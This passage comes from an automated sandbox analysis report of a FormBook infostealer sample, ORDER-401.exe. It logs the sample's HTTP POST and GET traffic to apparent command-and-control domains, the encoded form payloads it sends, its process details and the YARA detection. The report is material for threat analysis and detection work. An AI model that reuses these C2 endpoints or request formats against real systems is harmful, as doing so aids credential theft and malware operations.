                                                                  Content-Type: text/html; charset=utf-8
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  13192.168.2.849727154.205.159.116805240C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 12, 2024 21:39:21.202306032 CET813OUTPOST /ao44/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.jijievo.site
                                                                  Origin: http://www.jijievo.site
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 208
                                                                  Cache-Control: max-age=0
                                                                  Referer: http://www.jijievo.site/ao44/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                  Data Raw: 38 34 45 68 56 44 59 3d 4e 2b 48 32 53 6b 71 44 31 6b 55 35 35 4f 4a 2b 36 75 68 56 57 48 2f 4c 78 2b 7a 33 4b 6a 37 4e 4a 43 53 4e 57 44 75 48 53 75 57 6f 31 43 63 39 44 32 75 35 52 64 35 6c 46 68 2f 6f 67 76 65 48 45 63 76 52 73 5a 45 75 59 73 36 42 79 4b 43 69 79 46 58 51 42 36 79 53 52 6e 54 78 69 75 54 53 46 2b 78 4d 4f 50 52 70 59 33 52 53 62 35 32 41 66 6c 63 30 4c 75 55 37 79 7a 31 31 6d 7a 64 39 76 4c 6d 34 79 51 65 53 41 76 43 46 35 72 73 35 42 79 59 46 70 4b 5a 6c 72 4f 37 47 4f 30 55 33 68 53 37 65 59 56 35 78 4a 68 4b 4d 36 6f 69 51 6a 4d 33 67 46 65 54 7a 59 44 2b 2f 72 45 2f 63 4d 4c 4c 4b 4f 36 6f 3d
                                                                  Data Ascii: 84EhVDY=N+H2SkqD1kU55OJ+6uhVWH/Lx+z3Kj7NJCSNWDuHSuWo1Cc9D2u5Rd5lFh/ogveHEcvRsZEuYs6ByKCiyFXQB6ySRnTxiuTSF+xMOPRpY3RSb52Aflc0LuU7yz11mzd9vLm4yQeSAvCF5rs5ByYFpKZlrO7GO0U3hS7eYV5xJhKM6oiQjM3gFeTzYD+/rE/cMLLKO6o=
                                                                  Dec 12, 2024 21:39:22.821970940 CET241INHTTP/1.1 200 OK
                                                                  Content-Encoding: gzip
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Date: Thu, 12 Dec 2024 20:39:22 GMT
                                                                  Server: nginx
                                                                  Vary: Accept-Encoding
                                                                  Content-Length: 44
                                                                  Connection: close
                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00
                                                                  Data Ascii: KLIU(WHO-QHKM.g


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  14192.168.2.849728154.205.159.116805240C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 12, 2024 21:39:23.862206936 CET833OUTPOST /ao44/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.jijievo.site
                                                                  Origin: http://www.jijievo.site
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 228
                                                                  Cache-Control: max-age=0
                                                                  Referer: http://www.jijievo.site/ao44/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                  Data Raw: 38 34 45 68 56 44 59 3d 4e 2b 48 32 53 6b 71 44 31 6b 55 35 72 2b 5a 2b 68 4e 35 56 48 33 2f 4d 39 65 7a 33 46 44 37 52 4a 43 65 4e 57 42 66 41 54 63 79 6f 32 67 45 39 41 33 75 35 66 39 35 6c 4b 42 2f 70 2f 2f 65 36 45 63 54 6a 73 59 34 75 59 73 75 42 79 50 2b 69 79 32 2f 54 41 71 7a 30 65 48 54 7a 6d 75 54 53 46 2b 78 4d 4f 50 45 45 59 33 5a 53 62 49 47 41 4e 55 63 33 43 4f 55 34 37 54 31 31 69 7a 64 35 76 4c 6d 47 79 52 43 6f 41 74 71 46 35 75 51 35 42 6a 59 45 6a 4b 5a 5a 6d 75 36 43 4e 78 74 79 73 79 62 38 53 32 4d 58 56 44 57 35 37 65 54 36 35 75 2f 6d 47 65 37 59 59 41 57 4a 75 7a 69 30 57 6f 62 36 51 74 39 66 66 39 66 39 37 75 49 52 78 56 32 57 49 34 63 73 67 30 6b 44
                                                                  Data Ascii: 84EhVDY=N+H2SkqD1kU5r+Z+hN5VH3/M9ez3FD7RJCeNWBfATcyo2gE9A3u5f95lKB/p//e6EcTjsY4uYsuByP+iy2/TAqz0eHTzmuTSF+xMOPEEY3ZSbIGANUc3COU47T11izd5vLmGyRCoAtqF5uQ5BjYEjKZZmu6CNxtysyb8S2MXVDW57eT65u/mGe7YYAWJuzi0Wob6Qt9ff9f97uIRxV2WI4csg0kD
                                                                  Dec 12, 2024 21:39:25.493190050 CET241INHTTP/1.1 200 OK
                                                                  Content-Encoding: gzip
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Date: Thu, 12 Dec 2024 20:39:25 GMT
                                                                  Server: nginx
                                                                  Vary: Accept-Encoding
                                                                  Content-Length: 44
                                                                  Connection: close
                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00
                                                                  Data Ascii: KLIU(WHO-QHKM.g


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  15192.168.2.849729154.205.159.116805240C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 12, 2024 21:39:26.534866095 CET1850OUTPOST /ao44/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.jijievo.site
                                                                  Origin: http://www.jijievo.site
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1244
                                                                  Cache-Control: max-age=0
                                                                  Referer: http://www.jijievo.site/ao44/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                  Data Raw: 38 34 45 68 56 44 59 3d 4e 2b 48 32 53 6b 71 44 31 6b 55 35 72 2b 5a 2b 68 4e 35 56 48 33 2f 4d 39 65 7a 33 46 44 37 52 4a 43 65 4e 57 42 66 41 54 63 36 6f 32 56 59 39 43 51 36 35 63 39 35 6c 55 52 2f 53 2f 2f 65 64 45 59 48 6e 73 59 30 51 59 75 57 42 6f 71 79 69 37 6e 2f 54 4c 71 7a 30 47 33 54 32 69 75 53 53 46 2b 68 49 4f 50 55 45 59 33 5a 53 62 4b 4f 41 61 56 63 33 45 4f 55 37 79 7a 31 48 6d 7a 63 63 76 4c 76 39 79 52 58 58 41 39 4b 46 34 4f 67 35 44 52 77 45 76 4b 5a 68 68 75 36 6b 4e 78 70 35 73 79 48 61 53 32 4a 79 56 42 47 35 36 61 32 69 73 4d 72 75 45 38 32 73 58 43 2b 61 6e 55 57 77 66 72 58 51 53 66 56 66 52 71 47 52 35 2f 6b 70 32 31 4c 5a 52 76 55 6d 67 6a 38 4a 7a 30 69 6b 43 74 42 4e 70 45 44 4b 73 76 62 79 38 5a 48 76 55 6b 79 6e 39 59 6e 6e 38 69 54 73 43 61 61 4b 44 68 70 4c 62 66 4b 54 66 6a 65 6d 6b 42 6a 76 4b 65 79 6e 6a 72 5a 34 68 61 38 54 6b 67 71 6b 68 66 36 4e 6a 6e 73 61 77 62 63 77 76 63 73 51 48 77 30 51 6a 37 2b 6d 71 6c 6d 37 4b 66 31 5a 76 32 57 69 46 43 4a 45 4e 70 [TRUNCATED]
                                                                  Data Ascii: 84EhVDY=N+H2SkqD1kU5r+Z+hN5VH3/M9ez3FD7RJCeNWBfATc6o2VY9CQ65c95lUR/S//edEYHnsY0QYuWBoqyi7n/TLqz0G3T2iuSSF+hIOPUEY3ZSbKOAaVc3EOU7yz1HmzccvLv9yRXXA9KF4Og5DRwEvKZhhu6kNxp5syHaS2JyVBG56a2isMruE82sXC+anUWwfrXQSfVfRqGR5/kp21LZRvUmgj8Jz0ikCtBNpEDKsvby8ZHvUkyn9Ynn8iTsCaaKDhpLbfKTfjemkBjvKeynjrZ4ha8Tkgqkhf6NjnsawbcwvcsQHw0Qj7+mqlm7Kf1Zv2WiFCJENp8EukDp3AaMAxlXMEG3e59inJ1JRWffa/nkRybyQW8RikF9M3MXmI3m+RiZVy7JqUVApG6GQPai5YK21giXp6x0R79j2vBd+w8YrNT+z0jAGrDmq0Ifad6E3qST4YCBWKk7i7YA8N85ld4UfNsaxTToXk7LHavOgOQeTKOammHxfmIorNA9ZSAaCP4fYcZbKmYIGAFvzXM8nr5HT6sEhSEeXlQC2uVepwgyS8/3Hs4K6BXCHjjEuDRpqw1OHsKk8RLax3T14WuO2vFVHF4b1NiDx6viZgN9pvBwwdNN9Wqmk9tqGKUI+1g2kuvII9rZ20FGZx+hPKeMSZjx4rm/I4P5VwGiuiaATL5w0FkLoHBTMbMr3HqVmTCO8xk2jbGinDZ8jh3eGHeRcK26Z8F8CPx+SgyyHMFFvlOE5rXUasD+yccGoDArTh7ybIBdbxwFZH6539umY+mokobik8S8w86JaYP/zO7nFbO63udF+c8KHwQLy7L6ezE7gDsGe+2lRYUhG5cVjB+CWOQnfx5DX+hxai7HRZq+iE28lQEluKZRnpGHaq0WvnB/j/NRAl9tGc35eQttyuj2ioRI48ZI58ZleAToHOMcNjQfX34VHCrQwZ7+YCy+EePnblD3LwVmNQa5c4InIGDtAjpwZ5rXno/3kXNCQ4NeANLg [TRUNCATED]


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  16192.168.2.849730154.205.159.116805240C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 12, 2024 21:39:29.202048063 CET561OUTGET /ao44/?84EhVDY=A8vWRSiUvmcasJ06jd10HzibwJeuLRDoBnzJfQrGbsug5jYLYHm4CMBbVirMn9O9ScG8tIl9AuaKp46Lw3rsJODRcFfkv9imF+x3L/gfGWQmfZ+/LV4xLc4k9ChtjhwSrA==&Y6Bh=0jQHfl_Xbv0D_JU HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.jijievo.site
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                  Dec 12, 2024 21:39:30.889329910 CET197INHTTP/1.1 200 OK
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Date: Thu, 12 Dec 2024 20:39:30 GMT
                                                                  Server: nginx
                                                                  Vary: Accept-Encoding
                                                                  Content-Length: 24
                                                                  Connection: close
                                                                  Data Raw: 55 6e 61 62 6c 65 20 74 6f 20 67 65 74 20 63 6f 6e 6e 65 63 74 69 6f 6e
                                                                  Data Ascii: Unable to get connection


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  17192.168.2.8497313.33.130.190805240C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 12, 2024 21:39:36.545583010 CET837OUTPOST /nqht/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.likesharecomment.net
                                                                  Origin: http://www.likesharecomment.net
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 208
                                                                  Cache-Control: max-age=0
                                                                  Referer: http://www.likesharecomment.net/nqht/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                  Data Raw: 38 34 45 68 56 44 59 3d 36 34 54 75 6b 6f 45 43 55 6d 49 41 2f 62 52 44 34 4e 2f 36 5a 62 2b 42 33 39 32 2b 41 4c 6d 78 67 58 46 47 73 77 35 35 36 76 6e 48 59 76 49 6f 37 72 74 34 51 53 58 64 67 51 69 62 50 51 45 75 4e 61 52 6f 75 56 2b 36 6c 6a 47 54 79 70 59 6a 4c 57 32 61 47 52 51 70 67 50 37 4a 52 57 78 41 73 6a 6b 64 7a 52 2f 4e 68 58 76 45 65 75 7a 79 32 6c 70 73 6b 50 6f 78 53 46 55 45 6d 4d 6e 6a 35 55 53 31 43 7a 56 6e 6c 69 39 39 6a 68 4c 36 39 6c 33 56 6b 6b 2f 42 78 47 45 50 4f 4f 38 78 39 55 55 4a 78 72 63 30 77 7a 72 6c 77 36 38 6d 6e 74 53 77 32 7a 2b 6f 41 32 5a 4c 61 63 56 72 42 75 36 77 4e 74 34 3d
                                                                  Data Ascii: 84EhVDY=64TukoECUmIA/bRD4N/6Zb+B392+ALmxgXFGsw556vnHYvIo7rt4QSXdgQibPQEuNaRouV+6ljGTypYjLW2aGRQpgP7JRWxAsjkdzR/NhXvEeuzy2lpskPoxSFUEmMnj5US1CzVnli99jhL69l3Vkk/BxGEPOO8x9UUJxrc0wzrlw68mntSw2z+oA2ZLacVrBu6wNt4=
                                                                  Dec 12, 2024 21:39:37.625699997 CET73INHTTP/1.1 405 Method Not Allowed
                                                                  content-length: 0
                                                                  connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  18192.168.2.8497323.33.130.190805240C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 12, 2024 21:39:39.208513975 CET857OUTPOST /nqht/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.likesharecomment.net
                                                                  Origin: http://www.likesharecomment.net
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 228
                                                                  Cache-Control: max-age=0
                                                                  Referer: http://www.likesharecomment.net/nqht/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                  Data Raw: 38 34 45 68 56 44 59 3d 36 34 54 75 6b 6f 45 43 55 6d 49 41 38 37 68 44 30 4f 48 36 52 62 2b 41 72 4e 32 2b 62 62 6d 31 67 58 5a 47 73 78 4d 2b 36 63 44 48 5a 4c 4d 6f 36 71 74 34 58 53 58 64 34 67 69 55 43 77 45 78 4e 61 4d 58 75 51 47 36 6c 6a 43 54 79 74 49 6a 4c 46 65 5a 48 42 51 72 6f 76 37 48 56 57 78 41 73 6a 6b 64 7a 51 61 6d 68 54 44 45 65 2b 6a 79 32 45 70 6a 73 76 6f 79 52 46 55 45 69 4d 6e 2f 35 55 53 44 43 32 4d 4d 6c 67 31 39 6a 68 37 36 36 77 62 57 75 6b 2f 62 2f 6d 45 5a 44 50 56 46 33 6c 4d 56 2f 37 55 78 32 77 6a 65 38 73 4e 4d 39 50 61 32 31 7a 57 44 41 31 78 39 66 72 49 44 62 4e 71 41 54 36 76 68 59 61 6c 61 2f 41 68 46 41 62 54 73 6a 4b 44 43 4b 74 35 74
                                                                  Data Ascii: 84EhVDY=64TukoECUmIA87hD0OH6Rb+ArN2+bbm1gXZGsxM+6cDHZLMo6qt4XSXd4giUCwExNaMXuQG6ljCTytIjLFeZHBQrov7HVWxAsjkdzQamhTDEe+jy2EpjsvoyRFUEiMn/5USDC2MMlg19jh766wbWuk/b/mEZDPVF3lMV/7Ux2wje8sNM9Pa21zWDA1x9frIDbNqAT6vhYala/AhFAbTsjKDCKt5t


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  19192.168.2.8497333.33.130.190805240C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 12, 2024 21:39:41.898597956 CET1874OUTPOST /nqht/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.likesharecomment.net
                                                                  Origin: http://www.likesharecomment.net
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1244
                                                                  Cache-Control: max-age=0
                                                                  Referer: http://www.likesharecomment.net/nqht/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                  Data Raw: 38 34 45 68 56 44 59 3d 36 34 54 75 6b 6f 45 43 55 6d 49 41 38 37 68 44 30 4f 48 36 52 62 2b 41 72 4e 32 2b 62 62 6d 31 67 58 5a 47 73 78 4d 2b 36 63 4c 48 59 34 55 6f 37 4a 56 34 57 53 58 64 6d 51 6a 7a 43 77 46 72 4e 61 56 65 75 51 61 71 6c 68 71 54 7a 4b 67 6a 61 45 65 5a 4d 42 51 72 6b 50 37 4b 52 57 78 52 73 6a 30 52 7a 52 71 6d 68 54 44 45 65 38 72 79 2f 31 70 6a 71 76 6f 78 53 46 55 59 6d 4d 6e 62 35 55 4c 32 43 33 63 36 6d 51 56 39 69 46 58 36 37 43 6a 57 7a 30 2f 64 79 47 46 61 44 50 4a 61 33 6b 68 75 2f 36 51 62 32 77 72 65 2b 6f 51 7a 76 4e 4b 49 6b 44 36 53 47 30 70 58 62 5a 38 4a 57 73 72 76 65 4a 50 68 4f 38 67 75 30 69 39 4a 44 71 53 2b 31 4e 4c 43 48 61 34 6d 6e 34 51 51 4e 52 7a 2f 67 45 65 72 79 78 33 70 30 36 57 69 31 4c 31 47 49 6d 6f 36 6d 57 73 6e 38 6f 4e 45 4c 68 41 4a 67 66 63 4f 53 31 76 4c 54 74 53 50 42 57 4c 46 74 4c 4c 77 6d 52 48 4f 2b 76 34 62 69 69 64 38 69 7a 66 52 55 44 2f 62 4f 47 2b 4d 39 4f 64 5a 66 56 71 72 61 32 62 36 79 62 63 30 39 57 62 79 69 71 58 44 2b 39 [TRUNCATED]
                                                                  Data Ascii: 84EhVDY=64TukoECUmIA87hD0OH6Rb+ArN2+bbm1gXZGsxM+6cLHY4Uo7JV4WSXdmQjzCwFrNaVeuQaqlhqTzKgjaEeZMBQrkP7KRWxRsj0RzRqmhTDEe8ry/1pjqvoxSFUYmMnb5UL2C3c6mQV9iFX67CjWz0/dyGFaDPJa3khu/6Qb2wre+oQzvNKIkD6SG0pXbZ8JWsrveJPhO8gu0i9JDqS+1NLCHa4mn4QQNRz/gEeryx3p06Wi1L1GImo6mWsn8oNELhAJgfcOS1vLTtSPBWLFtLLwmRHO+v4biid8izfRUD/bOG+M9OdZfVqra2b6ybc09WbyiqXD+9snNXW2/VAmBtRwHn9ttllJfS88wwzNa0KXSg2921h2Nlj0rwNyZUSFwgxABUcxAVDjbmyfOf5g7/vAc5K+2jkkpCh1EZr8NrHJgMR9Dqy6ByqWI6FdDA6NrgZwIoS06NgrbLqs1GN0GZKs+tIszBnd49IfWloJcjxKRLnOm5h5fdrrUPJmE9gKSxVnbPuZRVpI2rtMYmCHZYAzLNGMduTjDX0CfmH1ujqoypgrcXRhy+P3+MPNLLO+cwTTOpZiABmMXl0/H3DeJrRxUzClhE3XGuiGRYMbf3V6N8wZaoB2g7Olgvl2QE5PRG0fHfn1zvlzF+E8yZThKvHlC18NLcVbQHHTf9NKs2iKrkA9P1wFfwalupSP19lHoJRqAWzGp8VTgJy9EtHYD1u8DoNXsukR2QC/Kjf691QyKNX+VJ6saa1kKw02KuQW/4SdueYR6AnmpJ1i3X0eQzEkiWPaASXePc2LSupThjcVEQYQ22S6SNVbVhJSWFHfSpIBFoPbdEcQeOofvgFwtVahaF8g5Yj6FQnSTYSYLHcKMsE+y1Ae9gPv4LNJxPK6PcMOmVGDngMxsTuhU3SOpRgBs4/znpUVrzAWJb5xLrEGJdE27DjJKBXf3a+zoIOStZJgcAH/nLsGpl5/5EUjYP/IKwNArWrc6lhczejKd/xM [TRUNCATED]
                                                                  Dec 12, 2024 21:39:42.967243910 CET73INHTTP/1.1 405 Method Not Allowed
                                                                  content-length: 0
                                                                  connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  20192.168.2.8497343.33.130.190805240C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 12, 2024 21:39:44.560446978 CET569OUTGET /nqht/?84EhVDY=367OndwPLlg1rtVHuu/hFbCGvJ/if429pQ84yAc488vbfZMJt5Z+HxLz7hXrMCY/VZoR2j/nhh+f1b5vdUOqFXsQoN/Zd2hU4gow+iq6njGFPvPjknhIkec1akMmhdytlQ==&Y6Bh=0jQHfl_Xbv0D_JU HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.likesharecomment.net
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                  Dec 12, 2024 21:39:45.713291883 CET397INHTTP/1.1 200 OK
                                                                  content-type: text/html
                                                                  date: Thu, 12 Dec 2024 20:39:45 GMT
                                                                  content-length: 276
                                                                  connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 38 34 45 68 56 44 59 3d 33 36 37 4f 6e 64 77 50 4c 6c 67 31 72 74 56 48 75 75 2f 68 46 62 43 47 76 4a 2f 69 66 34 32 39 70 51 38 34 79 41 63 34 38 38 76 62 66 5a 4d 4a 74 35 5a 2b 48 78 4c 7a 37 68 58 72 4d 43 59 2f 56 5a 6f 52 32 6a 2f 6e 68 68 2b 66 31 62 35 76 64 55 4f 71 46 58 73 51 6f 4e 2f 5a 64 32 68 55 34 67 6f 77 2b 69 71 36 6e 6a 47 46 50 76 50 6a 6b 6e 68 49 6b 65 63 31 61 6b 4d 6d 68 64 79 74 6c 51 3d 3d 26 59 36 42 68 3d 30 6a 51 48 66 6c 5f 58 62 76 30 44 5f 4a 55 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?84EhVDY=367OndwPLlg1rtVHuu/hFbCGvJ/if429pQ84yAc488vbfZMJt5Z+HxLz7hXrMCY/VZoR2j/nhh+f1b5vdUOqFXsQoN/Zd2hU4gow+iq6njGFPvPjknhIkec1akMmhdytlQ==&Y6Bh=0jQHfl_Xbv0D_JU"}</script></head></html>


                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:15:36:44
                                                                  Start date:12/12/2024
                                                                  Path:C:\Users\user\Desktop\ORDER-401.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\ORDER-401.exe"
                                                                  Imagebase:0x8c0000
                                                                  File size:762'368 bytes
                                                                  MD5 hash:3DFA099EE923A3F449F97CA8F522F703
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:4
                                                                  Start time:15:37:02
                                                                  Start date:12/12/2024
                                                                  Path:C:\Users\user\Desktop\ORDER-401.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\ORDER-401.exe"
                                                                  Imagebase:0x9c0000
                                                                  File size:762'368 bytes
                                                                  MD5 hash:3DFA099EE923A3F449F97CA8F522F703
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2097074904.00000000014B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
